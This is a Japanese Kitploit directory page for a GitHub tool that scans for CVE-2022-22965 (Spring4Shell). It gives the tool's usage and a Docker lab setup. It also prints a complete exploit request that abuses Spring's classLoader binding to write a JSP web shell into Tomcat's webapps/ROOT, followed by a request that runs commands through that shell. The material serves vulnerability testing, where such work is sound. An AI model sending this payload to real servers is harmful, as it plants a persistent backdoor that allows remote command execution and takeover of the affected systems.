Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-22965-Spring-Core-Rce — CVE-2022-22965のバッチ非破壊検出 | Kitploit
ツール/GitHubGitHub/tangxiaofeng7/cve-2022-22965-spring-core-rce
脆弱性スキャナーコンテナセキュリティ動的分析 (サンドボックス)エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubtangxiaofeng7/cve-2022-22965-spring-core-rce

CVE-2022-22965-Spring-Core-Rce

CVE-2022-22965のバッチ非破壊検出

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
39144年前Kitploit レビュー済み

Spring-Core JDK9+ RCE

使い方

root@kitploit:~
╰─ ./CVE-2022-22965 -h                                                                                                                                                                                                                                            ─╯
単一検出:./CVE-2022-22965 -u http://127.0.0.1:8080
一括検出:./CVE-2022-22965 -l url.txt 

脆弱性のローカルテスト

0x01 Dockerイメージ
root@kitploit:~
 docker pull vulfocus/spring-core-rce-2022-03-29
 docker run -itd -p 8080:8080 -P vulfocus/spring-core-rce-2022-03-29

-it:入力機能を有効にし、擬似端末に接続 -d: バックグラウンドでコンテナを実行 -p: ポートマッピング

0x02 ローカルWARパッケージ

WARパッケージをローカルのwebappsディレクトリに配置 JDKを9以上に切り替えます(ここではJDK11を使用)、その後Tomcatを起動 EXPの注入:

root@kitploit:~
POST / HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
suffix: %>
prefix: <%Runtime
Content-Type: application/x-www-form-urlencoded
Content-Length: 495

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di.getRuntime%28%29.exec%28request.getParameter%28%22cmd%22%29%29%3B%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell

コマンド実行:

root@kitploit:~
GET /shell.jsp?cmd=open%20/System/Applications/Calculator.app HTTP/1.1
Host: 127.0.0.1:8080

ツールをダウンロード